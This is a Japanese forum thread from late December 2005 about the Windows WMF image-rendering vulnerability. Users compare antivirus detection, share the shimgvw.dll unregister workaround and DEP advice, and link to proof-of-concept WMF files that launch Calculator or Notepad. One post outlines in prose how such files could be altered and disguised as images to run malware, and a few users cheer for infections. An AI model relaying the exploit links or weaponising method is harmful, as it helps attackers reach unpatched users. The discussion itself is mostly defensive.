>>34のリンクは使えるな、avast!の対画像系拡張子偽装で踏んでみたら、警報サイレン鳴ったよ
avast!使ってる奴らは、標準シールドの設定からjpg,jp2,bmp,gif,pngをコピペして登録しとけ!!

44 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:54:24 ID:6UzhwLQY0
>>40
アンチウイルス使わないのが基本ておまえ、釣り?

45 :25:2005/12/31(土) 01:57:38 ID:YDprSrhx0
すべてのファイルでおk

46 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:58:13 ID:HgMVY9ON0
>>44
読み方おかしいぞ

47 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:02:12 ID:hYeWhXVQ0
avastで>>34のファイルをローカルに保存してから常駐保護ONにして開くと、
警告が出るけど、後ろでWindows画像とFAXビューアが起動しちゃってるんだけど、
それってどうなの?regsvr32 -u %windir%\system32\shimgvw.dllしといたほうがいいかな?

48 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:04:47 ID:x2ym39O/0
NAV2005でSmartScan設定
メモ帳起動のテストページをOpera8.5で開いたら「警告無し、メモ帳開かず」
って結果になった。

とりあえずOpera8.5Jセーフって事で良いか。

49 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:05:02 ID:Iwjd4UAf0
>>44
取りあえず日本語を勉強しよう、話はそれからだ。

50 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:05:04 ID:kydeX0LA0
regsvr32 -u %windir%\system32\shimgvw.dllで

51 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:06:33 ID:lfvm4+9k0
>>40はセキュ板によくいる嵐でしょ。あんまり相手にしないほうがいいよ。しつこいから。

52 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:06:35 ID:udmWh6Ne0
ニュイルスソフトいれたほうがいいんかな、やっぱ。めんどkすえーんだよな

53 :43:2005/12/31(土) 02:08:25 ID:aHU31A750
>>47
ファイルが惜しかったらやって置いたほうが良いかも、開いた瞬間アウツ!……とか言ってたしな、最大限の対策は取るべき
……つか検証用ファイル落とそうとしたら、avast!様が「マルウェア含まれてるぞゴラァッ!!」って警告出して落とさせてくれなかったw


さしずめ今回の虚弱はケンシロウってどっかのブログに書いてたけど、対応済みのアンチウイルスはさしずめ「ハート様」か……

54 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:13:24 ID:EXpVIsQ/0
avast!導入してきたんだがまったく反応しない
標準シールドの設定の仕方がわからない

55 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:18:01 ID:Iwjd4UAf0
>>51
残念ながら全て事実ですよw
NOD32は結構トラブってる、Avastもシャットダウン問題とかあるしね。
ただ検出率とパターン(定義)ファイル更新頻度、未知のウィルス検出で言えば
ノートン先生とかバスタよりも優れている。
バスタとノートンは未だに山田ウィルスの亜種を、華麗にスルーする素敵クオリティーだからな・・・

>>54
インストしたデフォルトから、タスクトレイのアイコンをダブルクリック、各シールドの設定を変更できるぞ。
バスタとノートンでは出来ないOS起動前の「ブートタイムスキャン」も忘れずに実行すると幸せ。

56 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:18:12 ID:F04obVvj0
>>23
のスレってどこよ

57 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:21:17 ID:NWNGh7+c0
>>56
【セキュリティ】XPなど複数のWindows OSに深刻で未対応の脆弱性、休暇中のWebアクセスには注意を[12/28]
http://news19.2ch.net/test/read.cgi/newsplus/1135939990/

58 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:21:31 ID:7efmG4sx0
http://news19.2ch.net/test/read.cgi/newsplus/1135939990/l50

59 :43:2005/12/31(土) 02:22:06 ID:aHU31A750
トレイの中に入ってる青丸にaと書かれてる奴をクリック→オンアクセス保護の管理
標準シールド→詳細な設定→スキャナ(追加)→次の拡張子のファイルを検査に「WMF,JPG,JP2,GIF,PNG,BMP」とお前さんが良く見る画像ファイルの拡張子追加

テスト方法
>>34のリンク踏む→警報がなったら成功、ケンシロウの北斗神拳は無効化されています

60 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:24:39 ID:udmWh6Ne0
ああん?亜種スルーするってまじつかえねーな。意味アンの課乳ルイス祖父とって

61 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:25:27 ID:F04obVvj0
>>57,58
ありがd

62 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:25:56 ID:anTb8eZQ0
>バスタとノートンは未だに山田ウィルスの亜種を、華麗にスルーする素敵クオリティーだからな・・・

NOD32のヒューリスティックでも、山田の亜種は検出できないのでFA。
シグネチャの対応が必要でFA。

63 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:28:15 ID:Iwjd4UAf0
>>60
ぶっちゃけ、山田なんてny使わなきゃ感染する可能性少ないからどうでも良いんだよ。
問題は木馬系、アジアサイト産(日本、韓国、中国あたり)固有のトロイの木馬が完全スルー
それが激しく問題。


64 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:30:31 ID:RNpTHmnC0
普段、このスレは見てないけど
しばらく頻繁にレスをチェックした方が良さそうだな

65 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:31:37 ID:EXpVIsQ/0
標準シールドっていう項目があるのか?webとネットワークシールドしかないからさ・・。

66 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:37:14 ID:2kdJX6AJ0
>>65
オン・アクセススキャナを詳細表示にしないと見えない

67 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:37:37 ID:MYM80hL80
>セキュ板とダウソ板によくいる嵐と言えばコイツ

NOD厨と淫厨を兼ねる
http://tmp5.2ch.net/test/read.cgi/tubo/1130566010/
http://66.102.7.104/search?q=cache:yFC7aJM6xCgJ:l-lab.org/pukiwiki/pukiwiki.php
http://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
http://science3.2ch.net/test/read.cgi/infosys/1088029040/
http://mossarilog.at.infoseek.co.jp/




68 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:38:04 ID:SOO+iU3O0
とりあえず年末年始は忙しいから
完全な対応策出るまで封印するか・・・

しかしまぁ色々出てくるねぇウイルスってのは・・・

69 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:39:09 ID:2kdJX6AJ0
ウイルスじゃなくて脆弱性だっつの

70 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:41:59 ID:aHU31A750
今回の奴もトロイの木馬として登録されてるもんな、それを悪用されるととんでもない事になるって訳で……

とにかく今後の動向に注意する必要があるな、avast!様には派手に活躍してもらう事になりそうだ……結構重たくなったが、仕方がない

71 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:43:24 ID:EXpVIsQ/0
オン・アクセススキャナを詳細表示・・・・頭痛くなってきた・・・・

72 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:43:33 ID:cnAqXtdf0
これって要するにP2Pやらなきゃ大丈夫って類のもんじゃないよな?
スレみまわってるうちに自然に感染させられていたとかありえるよね

73 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:44:29 ID:mZeq5O9S0
>>71
スキャナ詳細表示にチェックしてて、>>34のリンクで警報鳴ればチェックを外しておk

74 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:45:30 ID:NWNGh7+c0
>>72
2chに限らない

75 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:45:46 ID:0JSrCGFN0
>>63
アジア限定のローカルな奴には、御三家の方が対応は早いよ。

76 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:46:18 ID:Iwjd4UAf0
>>62
何ヶ月も前に出現してる山田亜種だよ、シグネチャが未だに対応する気配無い。
LAN接続かファイル移動して個別に確認しないと、一台PCにインストするとソフト自身が競合するから
PC二台以上ないと確認は出来ないケドね。
つーかシマンテックとトレンドマイクロは、ユーザーの自主的検体提供率が低すぎなんじゃないかね。

>>69
起因は脆弱性だが、既に各社がウイルス認定済み。
よって当該コードを使用したバイナリはウイルスと称されるのが適切です。

77 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:46:21 ID:2kdJX6AJ0
「単にメモ帳を開くだけ」から「いきなりHDDあぼん」まで仕掛け方次第
感染云々とか考える前に終わってる可能性だってあるんだってばよ

78 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:46:41 ID:2fG6bEKE0
この板とまったく関係無くね?

79 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:47:28 ID:2kdJX6AJ0
トロイはウイスルじゃない

80 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:47:30 ID:0dwJeeSK0
>>72
2chならIEで見てれば平気だが、専ブラは危険なものがある。
仕込まれた通常のWebページなら感染。nyで流れたら、そのうちあちこちに貼られる
(その逆もあるけどな)

81 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:48:51 ID:YDprSrhx0
とにかくマイクロソフトはさっさと修正パッチ出してくれ!111

82 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:50:56 ID:EXpVIsQ/0
駄目だ・・・。何故か警報ならない・・・。

83 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:51:20 ID:NWNGh7+c0
>>78
全く関係ないとも言えなくね?

84 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:52:09 ID:xXiAhxuh0
>>73
>>34のは警報鳴るけど例の電卓起動やメモ帳起動は普通にされる俺のPCっていったい・・・

85 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:57:37 ID:HgMVY9ON0
今頃実験的に作ったのをc69に入れてる奴がいそうだな。

86 :[名無し]さん(bin+cue).rar:2005/12/31(土) 02:58:58 ID:0dwJeeSK0
>>85
そう思ってさっきからC69関連を地引してるんだが、
今のとこヒットしないなぁ

87 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:00:13 ID:2kdJX6AJ0
惨事

88 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:00:55 ID:6UzhwLQY0
>>55
アンチウイルス使っても問題起きない場合が多いよ。
フリーでも複数あるから選べるし。
ウイルスの危険に比べればコストの期待値は安いもんだ。
ま、おとなしく入れとけ。それでも万全には程遠いってこと忘れんなよ。


現状、でただでできる対策は、
http://www.microsoft.com/japan/technet/security/advisory/912840.mspx
 の回避策とる。
・avastかAntivirで検出できるから、入れる。
 設定はAntivirのほうが簡単だ。
・IrfanViewは使わない。manngameeyaは大丈夫。
こんなとこか。



89 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:02:01 ID:Ck+UEk/n0
こういうのってどういう経由で発見されるん?

90 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:02:24 ID:aHU31A750
試しにavast!のスキャンなしでファイル開いてみたら、なにも起きないんだよな…俺のwin98SE
検証用のファイルって、脆弱性があるので踏むと電卓なりメモ帳なりが起動するんだろ? てことは大丈夫って事だよな…

91 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:03:01 ID:qfCMqNT50
>>78
p2pに流れてから「わーたいへんだー」ってしろッてこと?
高確率でこれから流されるであろうコイツについては
事前に知っておいたほうがよくねーか?
対策も含めて。

92 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:08:53 ID:CNqBjWZO0
>>59のavast!の設定をミスした状態で>>34をunDonutで開いたんです
警告が鳴らなかったんですが、やばいですか? 
Java、スクリプト、ActiveXなどは全部offでした

いまは設定出来てて警告が出ます。 XP SP1です

93 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:09:44 ID:oKSZuE1/0
avastの使い方がさっぱり
>>34のファイルを踏んでも反応しないし
ダウンロードして実行しても反応無し
検査してやっとトロイ発見

どうすれば事前に反応してくれるんですか?

94 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:09:51 ID:zHQfJ5+a0
>>78
P2Pこそ狙われるかもしれない一番の標的じゃないか
これはダウン民に知らせないと大変な被害が出るぞ
まぁ犯罪者ばっかだからどうでもいいか

95 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:10:14 ID:k+6bnCtd0
分からなければ、無理に対策して試そうとしないで
MSのパッチくるまで待つ。

96 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:10:24 ID:ubwD5Wdo0
>>78
あえて言うなら全板に関係ある。
もっと言えば、ネットに接続する奴全てに関係ある。

97 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:10:41 ID:csQnmyfY0
XP SP2のDEP機能で防げるらしい、ということだが、
おそらくこの機能が使えるPCを使ってる人はまだ少数派だろう。
XPのSP2がリリースされた時点で、この機能が使えるコンシューマ向けCPUは、AMD Athlon64だけだったと思うし、
Intel CPUの場合、「NX bit対応」というのがこれが使えるという意味だが、1年半以上前のIntel CPUでは、対応してるものは無い。

さらに、XP SP2のDEP機能自体、デフォルトでは有効になってないはず。

98 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:11:02 ID:xXiAhxuh0
Athlon64だし、SP2入れればDEPで完全無効だったりして

99 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:12:59 ID:xXiAhxuh0
うは、タイムリーww

>>97アリガト

100 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:14:22 ID:S8P6XA3Y0
MangaMeeyaは大丈夫って
ZIPの中の偽装されたJPGも大丈夫?

101 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:14:39 ID:lwZz9gzT0
ny&share用サブPC(Win2000SP4)がny&share以外ネットに繋がらなくなったんだけど
これはNYウイルスじゃあないよね・・・

ZoneAlarm切ってもブラウザはルーターまでしか繋がらないし・・・・

102 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:15:40 ID:k+6bnCtd0
見てみたらDEP機能付いてた。
せっかく、欲しいのに繋がってるから再起動するのもったいない。

103 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:15:43 ID:ODATdF4K0
DEPを有効にしておけば問題ないじゃん。

104 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:16:44 ID:tQzGaTuy0
>>34
おおー、avastで警報なったぞ。
鳴らないって奴は感度高にして、スキャナ(追加)の設定を弄ってないんじゃね?


105 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:22:47 ID:0LAPph8W0
>>104
遮断はされているんだが警告がでないんだよなあ。
拡張子にアスタリスク放り込んだから効いているはずなんだが・・・

106 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:23:19 ID:YDprSrhx0
すべて を選んだ?

107 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:27:16 ID:iYVrzskz0
なんだよregsvr32 -u %windir%\system32\shimgvw.dllやっても
>>34が余裕で実行されるじゃんリンクでもローカルでも

108 :105:2005/12/31(土) 03:28:40 ID:0LAPph8W0
更新連打したら警報なった・・・
一体どうなってんだよ(((゚Д゚;)))

まあ、これで安心して寝れるからよしとするか・・・

109 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:30:12 ID:udmWh6Ne0
安心するなよwwwwwwww

110 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:35:03 ID:QK31tKJI0
標準シールドの出し方とそれに至る場所がわからん

オンアクセススキャナを詳細表示にする、の場所もわからん

わからーん λ....

111 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:35:12 ID:SOO+iU3O0
>>108
ちょwwおまwww

MSはいつごろ対策パッチ出すかな・・・
年明け?

112 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:39:28 ID:q2YdthAu0
阿鼻叫喚が繰り広がってる頃

113 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:39:40 ID:udmWh6Ne0
おもしれーから、コレ利用したキンタマ、山田その他のウィルスが感染拡大してからうめてくれねぇかなぁ

114 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:48:25 ID:k+6bnCtd0
MSパッチきたら意味なくなるけど。

115 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:49:32 ID:2kdJX6AJ0
今日中にパッチを出さないならMSは無能だと思うことにする

116 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:53:15 ID:z6SUchYb0
今日中にパッチ出したら、MSの検証期間は短いと思うことにする。

117 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:54:16 ID:2kdJX6AJ0
思うことにするって言うか、短いけどな、確かに

118 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:56:05 ID:0dwJeeSK0
大穴だからなぁ…。といっても年内にはどうもできんだろ。
あわててパッチ出して、それがさらに穴をあけることもある。
正月休みでぼけた香具師が家で感染しまくり、年明けに
PCメーカーやら回線業者やら巻き込んで大騒ぎ、だろな。
明日(今日か)あたりからTVニュースでガンガン流れるかも。

119 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:57:21 ID:dYrh4phS0
これか。
妙にNISのupdateがここ2、3日多いなと思ったら

120 :[名無し]さん(bin+cue).rar:2005/12/31(土) 03:58:57 ID:LGnJd7YB0
いつだったか流行ったblasterを思い出した。
今まで感染したウィルスはあれだけだな。

121 :[名無し]さん(bin+cue).rar:2005/12/31(土) 04:01:58 ID:z6SUchYb0
マジレス半分ネタ半分のつもりだったんだが…、ネタのバトンは渡し損ねたw

>>118
ウイルスを作るにも検証期間が必要だから、そこまで早くは出回らないと思うよ。
たいていの場合は、脆弱性が公開されてから
その脆弱性を利用したウイルスが出回るまでに、ある程度の間がある。

122 :[名無し]さん(bin+cue).rar:2005/12/31(土) 04:09:32 ID:P//uz6ET0
例の計算機とメモ帳はバスターの反応を確認
ウィルス名:TROJ NASCENE.GEN
今日アップデートした
こんで大丈夫れすか?

123 :[名無し]さん(bin+cue).rar:2005/12/31(土) 04:13:45 ID:2vriB7x30
ホント、面倒な穴をあけてくれたなあ。
しかしshimgvw.dllってのはどんなことやってんだ?
要は画像ファイルを展開してるんだろ、なんでexeを実行できるようになってんだ?
ワケわかんねーよ。

124 :[名無し]さん(bin+cue).rar:2005/12/31(土) 04:23:40 ID:aHU31A750
そうか……shimgvw.dllはWin98SEには入ってないんだよな……
ウィンドウズフォルダ検索したが、引っかからなかった。

まあ当分の間、最低パッチが出るまで厳戒態勢取っとくか……って

WIN98SEってパッチ出るのか? 無償サポート終わってるだろ!?
もしパッチ出なかったらテラヤバス……

125 :[名無し]さん(bin+cue).rar:2005/12/31(土) 04:30:45 ID:csQnmyfY0
>>123
「バッファオーバーラン」で、ググれ

126 :[名無し]さん(bin+cue).rar:2005/12/31(土) 04:59:11 ID:0dwJeeSK0
>>121
いや、すでに出回ってるんだよ。実際に攻略WMFを仕込んだサイトは
いくつか発見されてるし。何ができるかを分かっていたらバイナリ
エディタ扱うだけで検証用として上がってるメモ帳/電卓を起動する
WMFを書き換えることができる(実行形式ファイルの文字数だけあわせ
とけば、すでにシステムに存在するファイルなら無理やり実行できる)。
そのままでも環境によってはIEやらExplorerをダウンさせられるし。

拡張子がWMFである必要はないし、JPGでもGIF/TIF/PNG/DIBでもいい。
で、実行するexeを攻略サイトに隠しておいて、実行=落とさせる。
それが山田なら公開鯖で全情報漏れ漏れだし、破壊活動も簡単だがね。
画像BBSにでも貼られたら、何も対策してないと、かなり痛いと思うけどね。

127 :[名無し]さん(bin+cue).rar:2005/12/31(土) 05:12:10 ID:k+6bnCtd0
起きたらパッチ来てますように。

128 :[名無し]さん(bin+cue).rar:2005/12/31(土) 05:24:10 ID:9jCNOq7I0
パッチを入れて再起動

MS急ぎすぎで検証不足

"ようこそ"画面で固まって起動しなくなる

阿鼻叫喚が逆に早まる

想定外

129 :121:2005/12/31(土) 05:36:00 ID:z6SUchYb0
>>126
失礼、既に出回っているとは…。

> 画像BBSにでも貼られたら、何も対策してないと、かなり痛いと思うけどね。
心から同意。
欲を言えば2つ以上、少なくとも1つは対策を講じておかないと危険だな。

130 :[名無し]さん(bin+cue).rar:2005/12/31(土) 05:38:16 ID:wIEdbKVW0
一通りセキュリティソフトは対応したからとりあえず大丈夫っしょ
水曜にパッチ来るかなあ・・・MSの人もとんだ年始になったな

131 :[名無し]さん(bin+cue).rar:2005/12/31(土) 05:44:44 ID:Q2dydPXf0
亜種が簡単に作れるって言ってんのに、何がとりあえず大丈夫なんだか

132 :[名無し]さん(bin+cue).rar:2005/12/31(土) 05:45:44 ID:wIEdbKVW0
とりあえずだからとりあえずなんですよ

133 :[名無し]さん(bin+cue).rar:2005/12/31(土) 05:48:19 ID:Q2dydPXf0
一時間持たないような「とりあえず」でいいんなら安心してろ

134 :[名無し]さん(bin+cue).rar:2005/12/31(土) 05:48:36 ID:lfvm4+9k0
>>131
効果的なウィルスを仕込むのは、口で言うほどそんなに簡単なことじゃないと思うよ

135 :[名無し]さん(bin+cue).rar:2005/12/31(土) 05:49:23 ID:OPXMex9i0
>>134
131は知ったかだからしょうがないよ

136 :[名無し]さん(bin+cue).rar:2005/12/31(土) 06:00:48 ID:4apZFNN00
ただ根っこをどうにかしないと対処療法でどうにかなるレベルでないからなあ。。。

137 :[名無し]さん(bin+cue).rar:2005/12/31(土) 06:00:53 ID:Iwjd4UAf0
とりあえず確実なのは、

WinnyなどP2Pソフトをターゲットにしてばらまき始める輩が出る可能性が「大」とゆーこと。

コレで2006年のトレンドは画像動画ファイル開く(触る)と即感染ウイルス、ってこった。
緊急なアップデートが必要でもマイクロソフトは半月〜2ヶ月待ちでパッチリリースは基本だから
この脆弱性はWindows-OSそのものの非セキュアを決定的なものにする可能性があるな。
米マイクロソフト株を1割(日本円で9000億円〜1兆円)下げさせるくらいのインパクトに成り獲るな。

138 :[名無し]さん(bin+cue).rar:2005/12/31(土) 06:03:39 ID:YWzyDagS0
そんなに流行らないと思うけどなぁ
脆弱性攻撃はそれに気づかれて塞がれるまでが旬なわけだし

139 :[名無し]さん(bin+cue).rar:2005/12/31(土) 06:04:27 ID:1EKqpNHm0
凄いウイルスが出回ってるようだな…
アップデートがあるまでメインのWindowsマシン使うのをやめて、サブのLinuxマシン使おうかな。

140 :[名無し]さん(bin+cue).rar:2005/12/31(土) 06:05:45 ID:VtkI9w+00
たぶんDEPのせいだと思うけど>>34か前スレで出たどれかのファイルを
ローカルに保存してごそごそやってて、DEPをすべてのプログラムに有効にしてたら
青画面になって再起動したんだけどBoot.iniが真っ白になってて焦ったw
青画面はPAGE_FAULT_NONPAGED_AREAみたいなメッセージ。
その後何回か再起動したけど直らず。
MEMTESTやって一回電源落としてからは現れなくなった。

今回の脆弱性そのものの問題じゃないだろうけど一応気をつけるべし。
Athlon64 3200+/WinXPProSP2/avast!+BitDefender+MicrosoftAntiSpyware
avast!は標準シールド高、Web検査すべて。

せめてshimgvw.dllが何の形式をを扱えるのかぐらいわかれば対策もしやすいと思うんだけどな。

141 :[名無し]さん(bin+cue).rar:2005/12/31(土) 06:14:32 ID:0dwJeeSK0
>>134
既にあるもので、あまり警戒されてないもの(ジョークソフト)とか
対処が難しいもの(山田亜種など)を組み合わせるだけだからねぇ。
それほど困難ではないと思うけど……。

sony bmgのtoolkitでの隠蔽とか、キンタマ送り込むのがあるわけだし。
検証用のファイルが既にブラクラなんだしさ。で、あわててるヤツのところ
に、MS騙って対策ツールをダウンロードしてくれ、なんてメールが来て
そこが攻略Webで……。キーボードロガー埋められて、botになって……。

142 :[名無し]さん(bin+cue).rar:2005/12/31(土) 06:18:31 ID:oFetGxvt0
NAV2004で当該ファイルはウイルス認定されるけど、
ブラウザで開こうとすると警告無しでfaxビューアが一瞬起動する。
それ以降は電卓やメモ帳は起動しない。

どうなっちょるんじゃ・・・

143 :[名無し]さん(bin+cue).rar:2005/12/31(土) 06:40:00 ID:wEf+KqwZ0
ワシントン・ポスト紙早版ヘッドライン(30日付)

 [経済面]
 ★米マイクロソフト、スパイウェアやウィルスに対してコンピューターを危機にさらしている、これまで知られていなかったウィンドウズの欠陥が「極めて深刻な問題」だとして、必死で対策を講じる。
 ★11月の米中古住宅販売件数が前年比1.7%減少。住宅市場の冷え込みを示す新たな兆候に。
 [ワシントン 30日 ロイター]

ttp://headlines.yahoo.co.jp/hl?a=20051230-00000390-reu-int

144 :[名無し]さん(bin+cue).rar:2005/12/31(土) 06:56:16 ID:udmWh6Ne0
さっさとキンタマ入り流しまくれ

145 :[名無し]さん(bin+cue).rar:2005/12/31(土) 07:02:06 ID:R0SMzZex0
http://tmp5.2ch.net/test/read.cgi/download/1134743735/316

Windows 画像と Fax ビューア (Shimgvw.dll) を登録抹消する(中略)

1.[スタート] メニューの [ファイル名を指定して実行] に "regsvr32 -u %windir%\system32\shimgvw.dll"
(二重引用符は必要ありません) と入力し、次に [OK] をクリックします。
2.ダイアログ ボックスに、登録を解除するプロセスが正常に完了したことを確認するメッセージが表示されます。
[OK] をクリックして、ダイアログ ボックスを閉じます。

回避策の影響: Windows 画像と Fax ビューア は、ユーザーが Windows 画像と Fax ビューア に関連する
イメージの種類へのリンクをクリックしても起動されません。

Ifranviewが効いてるせいか、これ実行しても縮小表示されてしまうんですが('A`)
くそったれが、web踏んだだけで死亡確定か

146 :[名無し]さん(bin+cue).rar:2005/12/31(土) 07:07:27 ID:0dwJeeSK0
C69関連を地引してzipものを120〜130ファイルぐらい見たけど、
今のとこBloodhound.Exploit.56(先生の識別名)は未検出.....
まだC69ものが、たいして流れてないからかねぇ。
マスゴミは実被害が出るまで騒ぎにしないつもりなのかな

147 :[名無し]さん(bin+cue).rar:2005/12/31(土) 07:11:19 ID:HhOP/1UL0
Winnyを狙ったワーム・ニュイルス情報 Part47
http://tmp5.2ch.net/test/read.cgi/download/1134743735/334

>334 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2005/12/30(金) 16:57:24 ID:ZeZDB+us0 ?
>検証用ファイル

>ttp://grin.flagbind.jp/runcalc.wmf 電卓が起動するだけ
>ttp://kikuz0u.x0.com/wmf_exp.html メモ帳が起動するだけ

試しにこの上のruncalc.wmfをファイルに保存したら
「ファイルを削除できません。送り側のファイルまたはディスクから読み取れません。」
と表示されて削除できなくなってしまいました。
これってどうすればいいんでしょうか?

win2ksp4でavast!です。

148 :[名無し]さん(bin+cue).rar:2005/12/31(土) 07:21:46 ID:Qd/iClPw0
cmdプロンプト開いて
del 消したいファイルのパス

または再起動

はどう?

149 :[名無し]さん(bin+cue).rar:2005/12/31(土) 07:30:13 ID:HhOP/1UL0
>>148
d
同名のファイル作って上書きしたらなんとか消せました

150 :[名無し]さん(bin+cue).rar:2005/12/31(土) 07:34:57 ID:oOAPc1mI0
>>145
どーせログオフ再ログオンしてないとかいうオチだろ
どっちにしろテメーはPCを窓から投げ捨てとけ。それが世のためだ。

151 :[名無し]さん(bin+cue).rar:2005/12/31(土) 07:41:05 ID:1pJTmjaU0
でぇ、上のリンクは何の検証用なの?

152 :[名無し]さん(bin+cue).rar:2005/12/31(土) 07:45:48 ID:QBnEzXmO0
>>151
これ>
マイクロソフト セキュリティ アドバイザリ (912840): Graphics Rendering Engine の脆弱性によりコードが実行される可能性がある
http://www.microsoft.com/japan/technet/security/advisory/912840.mspx

>>147 はMetasploitで作った検証用コードだと思われ

153 :[名無し]さん(bin+cue).rar:2005/12/31(土) 08:01:43 ID:quXzRwN30
>>151
>>147はOSの欠陥を突いて電卓もしくはメモ帳を起動させるもの
試しにクリックしてみるといい
もしアンチウィルスソフトがこれをスルーして電卓もしくはメモ帳が起動してしまうようなら危険

これの電卓起動させる部分を、例えばHDDあぼ〜んウィルスを踏ますように書き換えた
ウィルスが今後出てくるかもしれない。アンチウィルスソフト有るとか無いとか関係無いわけだ。

一応いろんなアンチウィルスソフトの定義ファイルが更新されてるから
まだなら更新しときなさい

ttp://amatanoyo.blog16.fc2.com/blog-entry-132.html
も読んだほうがいい
まだ安心はできない

154 :[名無し]さん(bin+cue).rar:2005/12/31(土) 08:24:43 ID:n4m1sY4e0
symantec AntiVirusっていう変なのは
今現在の最新定義でも対応しないのね・・・

155 :[名無し]さん(bin+cue).rar:2005/12/31(土) 08:27:57 ID:q3SB95Zq0

ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2005/12.html#20051228_WMF
>NOD32 の場合AMON(常駐保護)〜のチェック対象に既定ではWMF ファイルは含まれないようです。
>〜WMFを追加し、AMONによるリアルタイム検査(常駐保護)の対象に含めるようにしておくことが必要〜。

つまりNOD32は拡張子を変えられると、悪意あるコードの実行阻止に失敗する可能性があるので注意が必要。
NOD使いの人は、上記リンクの要領で設定の変更を。



156 :[名無し]さん(bin+cue).rar:2005/12/31(土) 08:42:11 ID:XWEGIdH50
>>154
970 名前:966 [sage] 投稿日:2005/12/31(土) 04:21:24
カスペはパッチが出てたよ。
     ・
     ・
これまでに安全が確認されたのは

1)NOD32
2)マカフィー
3)バスター
4)ノートン
5)kaspersky (パッチ要)

157 :[名無し]さん(bin+cue).rar:2005/12/31(土) 08:55:24 ID:2M2nnc/a0
AvastとBitDefenderは対応してるらしい
ノートンは対応してないらしい

158 :[名無し]さん(bin+cue).rar:2005/12/31(土) 08:58:47 ID:pIVoqrEL0
>>157
BitDefenderは常駐保護しないからなぁ
今回のは常駐保護しないと結構危険かと

というわけでBitDefender使っていたが
avast追加インストールしたので再起動

159 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:03:51 ID:n4m1sY4e0
>>156
ありがと〜
ていうかMSパッチ出さない気かね

>>157
最初してなかったけど今はしてるんじゃないかな<ノートン
うちの2005は反応してくれた

160 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:08:13 ID:oOAPc1mI0
12/28の時点でどこのアンチウィルスソフトも対応しとる

161 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:12:11 ID:QewdX1Tb0
>>159
今ノートンのライブアップデートしたけど検証用の電卓弾いてくれなかった。
俺だけ?

162 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:13:07 ID:1y9lQ4KK0
つまり光の玉を使われたゾーマになっちまうってこってすか

163 :[名無し]さん(bin+cue).rar:2005/12/31(土) 09:15:49 ID:ggAtNr6P0
ノートン12/30日付の定義ファイルにしたら
wmfをDLしたその場で削除していった。
ブラウザは落としたファイルが消えてるんで泡食った感じ

